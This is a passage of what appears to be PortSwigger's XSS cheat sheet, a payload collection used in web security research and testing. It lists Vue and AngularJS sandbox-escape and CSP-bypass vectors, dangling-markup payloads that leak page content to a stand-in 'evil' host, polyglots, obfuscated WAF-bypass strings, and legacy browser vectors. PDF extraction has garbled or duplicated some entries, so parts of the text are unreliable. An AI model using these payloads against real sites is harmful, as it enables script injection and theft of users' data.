Version 2 Gareth Heyes (PortSwigger) & 24 <svg@load=this.alert(1)>
Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 40 {{_openBlock.constructor('alert(1)')()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 42 {{_createBlock.constructor('alert(1)')()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 46 {{_toDisplayString.constructor('alert(1)')()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 42 {{_createVNode.constructor('alert(1)')()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 47 <p v-show=_createBlock.constructor`alert(1)`()>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 41 <x @[_openBlock.constructor`alert(1)`()]>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 42 <x @[_capitalize.constructor`alert(1)`()]>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 52 <x @click=_withCtx.constructor`alert(1)`()>click</x>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 40 <x @click=$event.view.alert(1)>click</x>


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 34 {{_Vue.h.constructor`alert(1)`()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 33 {{$emit.constructor`alert(1)`()}}


Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 85 <teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div>


<script></script>
Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 85 <teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div>


<script></script>
Lewis Ardern & PwnFunction
(Independent consultant)

Version 3 Gareth Heyes (PortSwigger) & 35 <component is=script text=alert(1)>


Lewis Ardern & PwnFunction
(Independent consultant)

AngularJS sandbox escapes reflected


Version: Author: Length: Vector:

1.0.1 - 1.1.5 Mario Heiderich (Cure53) 41 {{constructor.constructor('alert(1)')()}}


1.0.1 - 1.1.5 Gareth Heyes (PortSwigger) & 33 {{$on.constructor('alert(1)')()}}
(shorter) Lewis Ardern (Synopsys)

1.2.0 - 1.2.1 Jan Horn (Google) 122 {{a='constructor';b=


{};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a
.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 Gareth Heyes (PortSwigger) 23 {{{}.")));alert(1)//"}}

1.2.6 - 1.2.18 Jan Horn (Google) 106 {{(_=''.sub).call.call({}


[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'ale
rt(1)')()}}

1.2.19 - 1.2.23 Mathias Karlsson (Detectify) 124 {{toString.constructor.prototype.toString=toString.constructor.prototy


pe.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 Gareth Heyes (PortSwigger) 23 {{{}.")));alert(1)//"}}

1.2.27- Gareth Heyes (PortSwigger) 23 {{{}.")));alert(1)//"}}


1.2.29/1.3.0-
1.3.20

1.3.0 Gábor Molnár (Google) 272 {{!ready && (ready = true) && ( !call ?
$$watchers[0].get(toString.constructor.prototype) : (a = apply) &&
(apply = constructor) && (valueOf = call) && (''+''.toString( 'F =
Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete
F.valueOf;' + 'alert(1);' )));}}

1.3.3 - 1.3.18 Gareth Heyes (PortSwigger) 128 {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=


[].join;'a'.constructor.prototype.charAt=
[].join;$eval('x=alert(1)//');}}

1.3.19 Gareth Heyes (PortSwigger) 102 {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=


[].join;$eval('x=alert(1)//');}}

1.3.20 Gareth Heyes (PortSwigger) 65 {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 Gareth Heyes (PortSwigger) 74 {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} }


};alert(1)//');}}

1.5.0 - 1.5.8 Ian Hickey & Gareth Heyes 79 {{x={'y':''.constructor.prototype};x['y'].charAt=


[].join;$eval('x=alert(1)');}}
(PortSwigger)

1.5.9 - 1.5.11 Jan Horn (Google) 517 {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply;


c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'}; ");
m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);
[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}

>=1.6.0 Mario Heiderich (Cure53) 41 {{constructor.constructor('alert(1)')()}}

>=1.6.0 (shorter) Gareth Heyes (PortSwigger) & 33 {{$on.constructor('alert(1)')()}}


Lewis Ardern (Synopsys)

DOM based AngularJS sandbox escapes (Using orderBy or no $eval)


Version: Author: Length: Vector:

1.0.1 - 1.1.5 Mario Heiderich (Cure53) 37 constructor.constructor('alert(1)')()

1.2.0 - 1.2.18 Jan Horn (Google) 118 a='constructor';b=


{};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a
.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 Mathias Karlsson (Detectify) 119 toString.constructor.prototype.toString=toString.constructor.prototype
.call;["a","alert(1)"].sort(toString.constructor)

1.2.24 - 1.2.26 Gareth Heyes (PortSwigger) 317 {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}


[['__proto__']]['x'];{}[['__proto__']]
['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]
['z']=constructor.defineProperty;d={}[['__proto__']]
['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}
[['__proto__']]['y'].value('alert(1)')()

1.2.27- Gareth Heyes (PortSwigger) 20 {}.")));alert(1)//";


1.2.29/1.3.0-
1.3.20

1.4.0-1.4.5 Gareth Heyes (PortSwigger) 75 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} }


};alert(1)//';

>=1.6.0 Mario Heiderich (Cure53) 37 constructor.constructor('alert(1)')()

1.4.4 (without Gareth Heyes (PortSwigger) 134 toString().constructor.prototype.charAt=[].join;


[1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,11
strings)
4,116,40,49,41)

AngularJS CSP bypasses


Version: Author: Length: Vector:

All versions Gareth Heyes (PortSwigger) 81 <input autofocus ng-


focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
(Chrome)

All versions Gareth Heyes (PortSwigger) 56 <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>


(Chrome)
shorter

All versions (all Gareth Heyes (PortSwigger) 91 <input autofocus ng-


focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'"
browsers)
>
shorter

1.2.0 - 1.5.0 Eduardo Vela (Google) 190 <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div>
<div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">
{{ [1].reduce(value.alert, 1); }}</div></div></div>

All versions Savan Gadhiya 49 <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>


(Chrome) (NotSoSecure)
shorter via oncut

Scriptless attacks

Dangling markup
Background attribute <body background="//evil? <table background="//evil? <table><thead
background="//evil? <table><tbody background="//evil? <table><tfoot
background="//evil? <table><td background="//evil? <table><th
background="//evil?

Link href stylesheet <link rel=stylesheet href="//evil?

Link href icon <link rel=icon href="//evil?

Meta refresh <meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute <img src="//evil? <image src="//evil?

Video using track element <video><track default src="//evil?


Video using source element and src attribute <video><source src="//evil?

Audio using source element and src attribute <audio><source src="//evil?

Input src <input type=image src="//evil?

Button using formaction <form><button style="width:100%;height:100%" type=submit


formaction="//evil?

Input using formaction <form><input type=submit value="XSS" style="width:100%;height:100%"


type=submit formaction="//evil?

Form using action <button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data <object data="//evil?

Iframe src <iframe src="//evil?

Embed src <embed src="//evil?

Use textarea to consume markup and post to <form><button formaction=//evil>XSS</button><textarea name=x>


external site

Pass markup data through window.name using form <button form=x>XSS</button><form id=x action=//evil target='
target

Pass markup data through window.name using base <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html>


<font size=100 color=red>You must click me</font></a><base target="
target

Pass markup data through window.name using <form><input type=submit value="Click me"
formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html
formtarget
formtarget="

Using base href to pass data <a href=abc style="width:100%;height:100%;position:absolute;font-


size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html
name="
page

Using iframe window name to pass data from the <iframe src=http://subdomain1.portswigger-
labs.net/dangling_markup/name.html name="
page

Using object window name to pass data from the <object data=http://subdomain1.portswigger-
labs.net/dangling_markup/name.html name="
page

Using frame window name to pass data from the <frameset><frame src=http://subdomain1.portswigger-
labs.net/dangling_markup/name.html name="
page

Overwrite type attribute with image in hidden inputs <input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1 javascript:/*--></title></style></textarea></script></xmp>


<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2 javascript:"/*'/*`/*--></noscript></title></textarea></style></template>


</noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3 javascript:/*--></title></style></textarea></script></xmp>


<details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwigge
rRes/)//'>
rRes/)// >

WAF bypass global objects

XSS into a JavaScript string: string concatenation ';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//


(window)

XSS into a JavaScript string: string concatenation ';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//


(self)

XSS into a JavaScript string: string concatenation ';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//


(this)

XSS into a JavaScript string: string concatenation ';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//


(top)

XSS into a JavaScript string: string concatenation ';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//


(parent)

XSS into a JavaScript string: string concatenation ';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//


(frames)

XSS into a JavaScript string: string concatenation ';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//


(globalThis)

XSS into a JavaScript string: comment syntax ';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]


['domain']);//
(window)

XSS into a JavaScript string: comment syntax (self) ';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax (this) ';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax (top) ';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax ';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]


['domain']);//
(parent)

XSS into a JavaScript string: comment syntax ';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]


['domain']);//
(frames)

XSS into a JavaScript string: comment syntax ';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]


['domain']);//
(globalThis)

XSS into a JavaScript string: hex escape sequence ';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']


['\x64\x6f\x6d\x61\x69\x6e']);//
(window)

XSS into a JavaScript string: hex escape sequence ';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']


['\x64\x6f\x6d\x61\x69\x6e']);//
(self)

XSS into a JavaScript string: hex escape sequence ';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']


['\x64\x6f\x6d\x61\x69\x6e']);//
(this)

XSS into a JavaScript string: hex escape sequence ';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']


['\x64\x6f\x6d\x61\x69\x6e']);//
(top)

XSS into a JavaScript string: hex escape sequence ';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']


['\x64\x6f\x6d\x61\x69\x6e']);//
(parent)

XSS into a JavaScript string: hex escape sequence ';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']


['\x64\x6f\x6d\x61\x69\x6e']);//
(frames)

XSS into a JavaScript string: hex escape sequence ';globalThis['\x61\x6c\x65\x72\x74']


XSS into a JavaScript string: hex escape sequence ;globalThis[ \x61\x6c\x65\x72\x74 ]

(globalThis) (globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']
['\x64\x6f\x6d\x61\x69\x6e']);//

XSS into a JavaScript string: hex escape sequence ';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"]


(window["\x61\x74\x6f\x62"]("WFNT"))');//
and base64 encoded string (window)

XSS into a JavaScript string: hex escape sequence ';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"]


(self["\x61\x74\x6f\x62"]("WFNT"))');//
and base64 encoded string (self)

XSS into a JavaScript string: hex escape sequence ';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"]


(this["\x61\x74\x6f\x62"]("WFNT"))');//
and base64 encoded string (this)

XSS into a JavaScript string: hex escape sequence ';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"]


(top["\x61\x74\x6f\x62"]("WFNT"))');//
and base64 encoded string (top)

XSS into a JavaScript string: hex escape sequence ';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"]


(parent["\x61\x74\x6f\x62"]("WFNT"))');//
and base64 encoded string (parent)

XSS into a JavaScript string: hex escape sequence ';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"]


(frames["\x61\x74\x6f\x62"]("WFNT"))');//
and base64 encoded string (frames)

XSS into a JavaScript string: hex escape sequence ';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"]


(globalThis["\x61\x74\x6f\x62"]("WFNT"))');//
and base64 encoded string (globalThis)

XSS into a JavaScript string: octal escape sequence ';window['\141\154\145\162\164']('\130\123\123');//


(window)

XSS into a JavaScript string: octal escape sequence ';self['\141\154\145\162\164']('\130\123\123');//


(self)

XSS into a JavaScript string: octal escape sequence ';this['\141\154\145\162\164']('\130\123\123');//


(this)

XSS into a JavaScript string: octal escape sequence ';top['\141\154\145\162\164']('\130\123\123');//


(top)

XSS into a JavaScript string: octal escape sequence ';parent['\141\154\145\162\164']('\130\123\123');//


(parent)

XSS into a JavaScript string: octal escape sequence ';frames['\141\154\145\162\164']('\130\123\123');//


(frames)

XSS into a JavaScript string: octal escape sequence ';globalThis['\141\154\145\162\164']('\130\123\123');//


(globalThis)

XSS into a JavaScript string: unicode escape ';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']


('\u{0058}\u{0053}\u{0053}');//
(window)

XSS into a JavaScript string: unicode escape (self) ';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']


('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape (this) ';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']


('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape (top) ';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']


('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape ';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']


('\u{0058}\u{0053}\u{0053}');//
(parent)

XSS into a JavaScript string: unicode escape ';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']


('\u{0058}\u{0053}\u{0053}');//
(frames)

XSS into a JavaScript string: unicode escape ';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']


('\u{0058}\u{0053}\u{0053}');//
( l b lThi )
( \u{0058}\u{0053}\u{0053} );//
(globalThis)

XSS into a JavaScript string: RegExp source ';window[/al/.source+/ert/.source](/XSS/.source);//


property (window)

XSS into a JavaScript string: RegExp source ';self[/al/.source+/ert/.source](/XSS/.source);//


property (self)

XSS into a JavaScript string: RegExp source ';this[/al/.source+/ert/.source](/XSS/.source);//


property (this)

XSS into a JavaScript string: RegExp source ';top[/al/.source+/ert/.source](/XSS/.source);//


property (top)

XSS into a JavaScript string: RegExp source ';parent[/al/.source+/ert/.source](/XSS/.source);//


property (parent)

XSS into a JavaScript string: RegExp source ';frames[/al/.source+/ert/.source](/XSS/.source);//


property (frames)

XSS into a JavaScript string: RegExp source ';globalThis[/al/.source+/ert/.source](/XSS/.source);//


property (globalThis)

XSS into a JavaScript string: Hieroglyphy/JSFuck ';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+


(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
(window)

XSS into a JavaScript string: Hieroglyphy/JSFuck ';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!!


[]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
(self)

XSS into a JavaScript string: Hieroglyphy/JSFuck ';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!!


[]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
(this)

XSS into a JavaScript string: Hieroglyphy/JSFuck ';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!!


[]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
(top)

XSS into a JavaScript string: Hieroglyphy/JSFuck ';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+


(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
(parent)

XSS into a JavaScript string: Hieroglyphy/JSFuck ';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+


(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
(frames)

XSS into a JavaScript string: Hieroglyphy/JSFuck ';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!!


[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
(globalThis)

Content types
This section lists content-types that can be used for XSS with the X-Content-Type-Options: nosniff header active.

Content-Type Browsers PoC


text/html <script>alert(document.domain)</script>
application/xhtml+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
application/xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
text/xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
image/svg+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
text/xsl <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
application/vnd.wap.xhtml+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
text/rdf <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
application/rdf+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
application/mathml+xml <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:scrip…
text/vtt <script>alert(document.domain)</script>
text/cache-manifest <script>alert(document.domain)</script>

Response content types

This section lists content-types that can be used for XSS when you can inject into the content-type header.
PoC
Content-Type Browsers
<script>alert(document.domain)</script>
text/plain; x=x, text/html, foobar
<script>alert(document.domain)</script>
text/html(xxx
<script>alert(document.domain)</script>
text/html xxx
<script>alert(document.domain)</script>
text/html xxx
<script>alert(document.domain)</script>
text/html, xxx
<script>alert(document.domain)</script>
text/html; xxx

Impossible labs

To find out what these are for, please refer to Documenting the impossible: Unexploitable XSS labs.

Title Description Length Closest vector Link


limit
Basic context, WAF This lab captures the scenario when you can't use an open tag followed by an alphanumeric N/A N/A 🔗
blocks <[a-zA-Z] character. Sometimes you can solve this problem by bypassing the WAF entirely, but what
about when that's not an option? Certain versions of .NET have this behaviour, and it's only
known to be exploitable in old IE with <%tag.
Script based injection We often encounter this situation in the wild: you have an injection inside a JavaScript variable N/A N/A 🔗
but quotes, forward and can inject angle brackets, but quotes and forward/backslashes are escaped so you can't
slash and backslash are simply close the script block.
escaped
The closest we've got to solving this is when you have multiple injection points. The first within
a script based context and the second in HTML.
innerHTML context but You have a site that processes the query string and URL decodes the parameters but splits on N/A N/A 🔗
no equals allowed the equals then assigns to innerHTML. In this context <script> doesn't work and we can't use =
to create an event.
Basic context length This lab's injection occurs within the basic HTML context but has a length limitation of 15. 15 <q oncut=alert`` 🔗
limit Filedescriptor came up with a vector that could execute JavaScript in 16 characters: <q
oncut=alert`` but can you beat it?
Attribute context length The context of this lab inside an attribute with a length limitation of 14 characters. We came up 14 "oncut=alert`` 🔗
limit with a vector that executes JavaScript in 15 characters:"oncut=alert``+ the plus is a trailing
space. Do you think you can beat it?
Basic context length It's all well and good executing JavaScript but if all you can do is call alert what use is that? In 19 <q 🔗
limit, arbitrary code this lab we demonstrate the shortest possible way to execute arbitrary code. oncut=eval(name)
Attribute context length Again calling alert proves you can call a function but we created another lab to find the 17 See link 🔗
limit arbitrary code shortest possible attribute based injection with arbitrary JavaScript.
Injection occurs inside a We received a request from twitter about this next lab. It occurs within a frameset but before a N/A N/A 🔗
frameset but before the body tag with equals filtered. You would think you could inject a closing frameset followed by a
body script block but that would be too easy.
Injection occurs inside The injection occurs within a single quoted string and the challenge is to execute arbitrary N/A N/A 🔗
single quoted string, code using the charset a-zA-Z0-9'+.`
only characters a-z0-
9+'.` are allowed.

Classic vectors (XSS crypt)

Image src with JavaScript protocol <img src="javascript:alert(1)">

Body background with JavaScript protocol <body background="javascript:alert(1)">

Iframe data urls no longer work as modern browsers <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
use a null origin

VBScript protocol used to work in IE <a href="vbscript:MsgBox+1">XSS</a> <a href="#"


onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#"
onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs
onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that <a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#"
onclick="JSCRIPT.COMPACT:alert(1);">test</a>
wasn't widely used in IE

JScript.Encode allows encoded JavaScript <a href=# language="JScript.Encode"


onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=#
onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encoded allows encoded VBScript <iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe


language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
JavaScript entities used to work in Netscape <a title="&{alert(1)}">XSS</a>
Navigator

JavaScript stylesheets used to be supported by <link href="xss.js" rel=stylesheet type="text/javascript">


Netscape Navigator

Button used to consume markup <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume <form action=x><button>XSS</button><select name=x><option><plaintext>
<script>token="supersecret"</script>
markup

XBL Firefox only <= 2 <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">


<div style="\-\mo\z-
binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-
bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"> <div style="-
moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data urls <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-
8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22
http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimple
mentation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js
%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20sc
r.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20
document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.
appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%
3C/ binding%3E%3C/bindings%3E)" />

CSS expressions <=IE7 <div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)>


<div style=xss:expressio\6e(alert(1))> <div
style=xss:expressio\006e(alert(1))> <div
style=xss:expressio\00006e(alert(1))> <div
style=xss:expressio\6e(alert(1))> <div
style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of : <div style=xss=expression(alert(1))> <div style="color&#x3dred">test</div>

Behaviors for older modes of IE <a style="behavior:url(#default#AnchorClick);"


folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in <script> function window.onload(){ alert(1); } </script> <script> function
window::onload(){ alert(1); } </script> <script> function window.location()
functions
{ } </script> <body> <script> function/*<img src=1
onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body>
<script> function document.body.innerHTML(){ x = "<img src=1
onerror=alert(1)>"; } </script> </body>

GreyMagic HTML+time exploit (no longer works <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">


<?import namespace="t" implementation="#default#time2"><t:set
even in 5 docmode)
attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY>
</HTML>

Firefox allows NULLS after & <a href="javascript&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities <a href="javascript&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening <!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="-->
<iframe/onload=alert(1)>"> -->
comments

Safari used to allow any tag to have a onload event <svg><xss onload=alert(1)>
inside SVG

Isindex using src attribute <isindex type=image src="//evil?

Isindex using submit <isindex type=submit style=width:100%;height:100%; value=XSS


formaction="//evil?

Isindex and formaction <isindex type=submit formaction=javascript:alert(1)>


Isindex and action <isindex type=submit action=javascript:alert(1)>

Credits
Brought to you by PortSwigger Research.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo
Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a,
Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay,
Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush
Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David
Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg,
diofeher, Sergey Bobrov, PwnFunction
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request

You might also like